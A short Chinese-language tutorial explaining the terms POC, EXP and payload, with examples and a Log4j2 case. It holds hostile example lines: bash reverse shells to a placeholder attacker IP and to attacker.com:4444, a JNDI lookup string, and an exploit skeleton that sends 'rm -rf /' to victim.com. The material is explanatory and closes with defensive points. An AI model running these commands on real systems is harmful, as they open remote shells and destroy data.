poc/exp/payload

当我们刚开始入坑的时候很多朋友经常听说这三个名词，但是许多小伙伴可能并不清楚这三者之间的区别与联系。本文章就来说说这三者的区别

1. Payload（有效载荷）

• 定义：攻击中实际执行的恶意代码或指令。

• 作用：实现攻击目标（如获取Shell、窃取数据、加密文件）。

• 特点：

  • 是攻击的最终执行阶段

  • 独立于漏洞利用方式（同一个Payload可用于不同EXP）

• 示例：

  bash

  # 反向Shell的Payload（Bash）
  bash -i >& /dev/tcp/攻击者IP/端口 0>&1
  ​
  # 文件加密勒索Payload（伪代码）
  encrypt_files("/home/", aes_key)

2. POC（Proof of Concept，概念验证）

• 定义：证明漏洞存在的代码或方法。

• 作用：验证漏洞真实性，不追求实际攻击效果。

• 特点：

  • 通常是漏洞公开后的第一份公开代码

  • 可能只触发漏洞（如使服务崩溃、返回特定响应）

• 示例：

  http

  GET /vuln?param={{7*7}} HTTP/1.1
  # 触发SSTI漏洞，响应中出现"49"即证明漏洞存在

3. EXP（Exploit，漏洞利用程序）

• 定义：完整的漏洞利用工具/代码，包含漏洞触发和Payload交付。

• 作用：实现完整的攻击链（从漏洞触发到获取控制权）。

• 特点：

  • 包含漏洞利用逻辑 + Payload

  • 通常需要适配目标环境（如操作系统、软件版本）

• 示例：

  python

  # 针对CVE-2023-1234的Python EXP
  target = "http://victim.com/vuln_endpoint"
  payload = "rm -rf /"  # 恶意Payload
  ​
  # 构造漏洞触发请求
  headers = {"Content-Type": "malicious/format"}
  data = generate_exploit_payload(payload)
  ​
  requests.post(target, headers=headers, data=data)  # 发送EXP

三者关系示意图

漏洞发现 → 编写POC证明存在 → 开发EXP实现攻击 → EXP内嵌入Payload

对比表格

实际案例：Log4j2漏洞 (CVE-2021-44228)

1. POC：发送 ${jndi:ldap://example.com} 触发DNS查询

2. EXP：构造恶意LDAP服务 + 注入反弹Shell指令

3. Payload：bash -i >& /dev/tcp/attacker.com/4444 0>&1

注意事项

• POC ≠ EXP：公开的POC通常不含恶意Payload

• Payload独立性：同一EXP可更换不同Payload（如Shell、挖矿、勒索）

• 防御重点：

  • 拦截EXP中的漏洞利用模式

  • 监控Payload的异常行为（如可疑进程创建）